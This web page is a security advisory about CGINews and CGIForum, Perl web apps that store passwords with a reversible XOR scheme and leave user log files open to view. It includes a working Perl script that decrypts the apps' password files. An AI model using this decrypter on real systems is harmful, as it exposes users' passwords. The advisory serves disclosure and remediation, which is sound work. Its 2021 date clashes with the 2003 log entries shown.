GulfTech Computers - Professional Computer Services  
Additional Links
-> Dicussion Forum
-> Encryption Tools
-> Information Tools
-> Net Info Tools
-> Latest Advisories
-> Latest Vulns
-> Latest Win Software
-> Latest Nix Software
-> Security News
-> Security Press
Recent News

GulfTech Computers strives to beat the price(s) of any other business around. Check with us first as it just may save you some time and money. And who doesn't want to save money? Please contact us with any questions or inquiries.

Latest GulfTech Releases

SubScan v1.2 Scans a domain for DNS records and SubDomains. Very stealthy, and can be used to find many hosts not on the public netblock. A very interesting tool to say the least. Works on both Nix and Windows based systems. Get it now!

Download SubScan v1.2

Search GulfTech
You can use the form below to search our site. Just enter the keyword or keywords to search.
Latest Advisories
MIT krb5 Security Advisory - buffer overflows in krb5_aname_to_localname (2004-001)
Gentoo Linux Security Advisory - tla: Multiple vulnerabilities in included libneon (Errata Update GLSA 200405-25:02)
Debian Security Advisory - New rsync packages fix directory traversal bug (DSA 499-2)
Debian Security Advisory - New gallery packages fix unauthenticated access (DSA 512-1)
Slackware Security Advisory - PHP local security issue (SSA:2004-154-02)
Latest Vulnerabilities
Mollensoft Lightweight FTP Server CWD Buffer Overflow Vulnerability
Firebird Database Remote Database Name Overflow Vulnerability
PHPNuke Inadequate Security Checking Vulnerability
Nuke Cops betaNC PHP-Nuke Inadequate Security Checking Vulnerability
OSC2Nuke Inadequate Security Checking Vulnerability
Latest Security News
Security vendor says offshore development needs checks
Windows gets 'strong' passwords as SecurID trials kick off
Apple and OS security - communication is key
Double Snorting
Multiple security roles with Unix/Linux















Issues In CGINews And CGIForum
December 14, 2021


Vendor : Markus Triska
URL : http://triskam.virtualave.net/cginews.html
Version : 1.07 And Possible Earlier & CGIForum 1.09
Risk : Weak Encryption & Info Disclosure


Description:
CGINews is a multi-user Web site news posting system written in Perl. Main features include: adding, updating, and deleting news entries, multi-user functionality, sections, access levels, logs, highly-configurable layout, file upload, binary attachments and more.


Weak Password Encryption:
The CGI News program does not use DES, MD5 or any other one way crypt algorithm. It instead uses a weak, decryptable method. Below is a script that can easily decrypt the passwords found in the programs *.pwl files. This issue is also present in CGIForum 1.09 by Markus Triska and can be used to decode CGIForum password files as well.



###################################################################################
# Markus Triska Password Decrypter. Works on most if not all Markus Triska products
# For example: CGIForum, CGINews etc - Written By JeiAr [ http://www.gulftech.org ]
###################################################################################
print "CGI News 1.07 - Pass Decrypt Utility \n";
print "------------------------------------ \n";
print "By JeiAr [ http://www.gulftech.org ] \n";
print "\n" x 3;
print "Please Enter Encrypted Pass:";
$UserPassword = <STDIN>;
chomp $UserPassword;
$UserPassword = EncDec($UserPassword);
print "\n" x 5;
print "Encrypted Pass Is: $UserPassword";
sub EncDec
{
	my @args = split //, shift();
	my $retval = '';
	for (my $stringpos = 0; $stringpos <= $#args; $stringpos++) {
		$retval .= chr(ord($args[$stringpos]) ^ 0x12);
	}
	return $retval;
}
exit;
###################################################################################


Information Disclosure Vulnerability:
By default the users log files are viewable. username/username.log The only files not viewable by default are the .pwl files



Sat Dec 13 21:06:37 2003: jeiar changed password.
Sat Dec 13 21:10:21 2003: jeiar changed E-Mail/Syntax: test@blah/jeiar.
Sat Dec 13 21:10:54 2003: jeiar tried to change password.
Sat Dec 13 21:13:59 2003: jeiar uploaded file: C:\cmd.exe
Sat Dec 13 21:31:38 2003: jeiar uploaded file: C:\cnc.pl


Solution:
You can add your own DES or MD5 encryption if you are familiar with PERL, and to solve the logfile problem simply add a .htaccess file that makes the directory not viewable. For example



AuthType Basic
AuthName "No access"
AuthUserFile .htnopasswd
AuthGroupFile /dev/null
Require valid-user
The author plans on including this type of .htaccess file in future versions, but does not have any plans on changing or strengthening the encryption method.


Credits:
Credits go to JeiAr of the GulfTech Security Research Team.






© Copyright 2002 - GulfTech Computers, All Rights Reserved
Contact GulfTech Computers